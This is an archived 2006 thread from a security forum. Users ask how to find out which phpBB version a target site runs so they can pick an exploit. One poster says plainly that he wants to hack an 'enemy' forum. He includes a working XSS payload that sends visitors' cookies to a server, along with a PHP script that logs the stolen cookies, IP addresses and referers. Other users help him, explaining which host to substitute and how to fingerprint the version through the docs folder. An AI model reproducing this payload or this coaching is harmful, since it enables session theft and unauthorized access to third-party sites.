Waraxe IT Security Portal
Login or Register
October 25, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 135
Members: 0
Total: 135
Full disclosure
SEC Consult SA-20241024-0 :: Unauthenticated Path Traversal Vulnerability in Lawo AG - vsm LTC Time Sync (vTimeSync) (CVE-2024-6049)
[RESEARCH] DTLS 'ClientHello' Race Conditions in WebRTCImplementations
Adversary3 updated with 700 malware and C2 panelvulnerabilities
SEC Consult SA-20241015-0 :: Multiple Vulnerabilities in Rittal IoT Interface & CMC III Processing Unit (CVE-2024-47943, CVE-2024-47944, CVE-2024-47945)
CVE-2024-48939: Unauthorized enabling of API in Paxton Net2software
SEC Consult SA-20241009-0 :: Local Privilege Escalation via MSI installer in Palo Alto Networks GlobalProtect (CVE-2024-9473)
APPLE-SA-10-03-2024-1 iOS 18.0.1 and iPadOS 18.0.1
Some SIM / USIM card security (and ecosystem) info
SEC Consult SA-20240930-0 :: Local Privilege Escalation via MSI Installer in Nitro PDF Pro (CVE-2024-35288)
Backdoor.Win32.Benju.a / Unauthenticated Remote CommandExecution
Backdoor.Win32.Prorat.jz / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Amatu.a / Remote Arbitrary File Write (RCE)
Backdoor.Win32.Agent.pw / Remote Stack Buffer Overflow (SEH)
Backdoor.Win32.Boiling / Remote Command Execution
Defense in depth -- the Microsoft way (part 88): a SINGLEcommand line shows about 20, 000 instances of CWE-73
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpBB -> How to find out PHPBB version.
Post new topicReply to topic View previous topic :: View next topic
How to find out PHPBB version.
PostPosted: Fri Apr 07, 2006 12:31 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok, So I have the site I have the exploits but I dont know which to use.

How do I find out which version they have. Shocked
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 12:33 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:11 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Cheers man, works like a teapot.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 1:16 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Ok, Now this forum has a 2.0.18.

Therefore, I use this:

Quote:
<pre a=">" onmouseover='document.location="http://localhost/cookies.php?c="+document.cookie' b="<pre" >


cookies.php

<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('log.txt', 'a'); //chmod 777 log.txt
fwrite($fp,
'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.' ');
fclose($fp);
?>


Could someone just tell me what bits I change.

Thanks. Very Happy
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 2:27 pm Reply with quote
Aryan-Husky
Active user
Active user
Joined: Apr 03, 2006
Posts: 37




Check previous post, the only think to change is the location of your server, I also think your target phpBB needs to have html set to on.
View user's profile Send private message
PostPosted: Fri Apr 07, 2006 4:21 pm Reply with quote
Bill324
Regular user
Regular user
Joined: Apr 07, 2006
Posts: 11




Do I change the server to MY website or the 'enemys' website host.

If its the person im trying to hack, how do I get their server details? Shocked
View user's profile Send private message
PostPosted: Wed May 10, 2006 10:10 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




sljyro wrote:
http://www.site.com/forum/docs/CHANGELOG.html

where 'site.com/forum' is the actual forum URL


This doesn't seem to work on the forum i'm trying to gain access to. Any1 have any other ideas besides this one, /docs/INSTALL.html?
View user's profile Send private message
PostPosted: Thu May 11, 2006 6:18 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




well theres a flaw with that, the use might have updated the forum, but not the docs, which happens in many cases. so that way is never 100%.

if it doesnt work (and you are sure its a phpBB and putting the correct url), there's a possibility the user has moved/deleted the docs folder from the server.
View user's profile Send private message
PostPosted: Thu May 11, 2006 7:07 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




Yeah, i'm sure i typed it correctly and it is a phpBB forum. I tried it on another site and it worked.

The site was revamped to a phpBB forum Jan this year so culd that determine what version they're running?
View user's profile Send private message
PostPosted: Thu May 11, 2006 10:20 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




if its jan, could be a 2.0.18 or .19
View user's profile Send private message
PostPosted: Fri May 12, 2006 4:54 pm Reply with quote
BlaQ_PhoeniX
Regular user
Regular user
Joined: May 11, 2006
Posts: 5




Ah, thanx for da help dude.
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 7:58 pm Reply with quote
superninja
Active user
Active user
Joined: Jul 03, 2006
Posts: 38




Where it says what version is? Embarassed
View user's profile Send private message
PostPosted: Mon Jul 03, 2006 9:51 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




superninja wrote:
Where it says what version is? Embarassed


Take a good look at changelog and you will see, what is the latest version, described Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 26, 2006 12:38 am Reply with quote
VanVip
Beginner
Beginner
Joined: Nov 21, 2005
Posts: 4




hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?
View user's profile Send private message
PostPosted: Thu Jul 27, 2006 12:40 pm Reply with quote
sljyro
Advanced user
Advanced user
Joined: Mar 23, 2006
Posts: 53




VanVip wrote:
hey... my question is: how can i get the version if the URL is not like site.com/forum... it's 'site'.forump.com... i did: 'site'.forump.com/doc/CHANGELOG.html but it doesn't works... how can i get the version in forums like this ?


try docs

and not doc
View user's profile Send private message
How to find out PHPBB version.
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds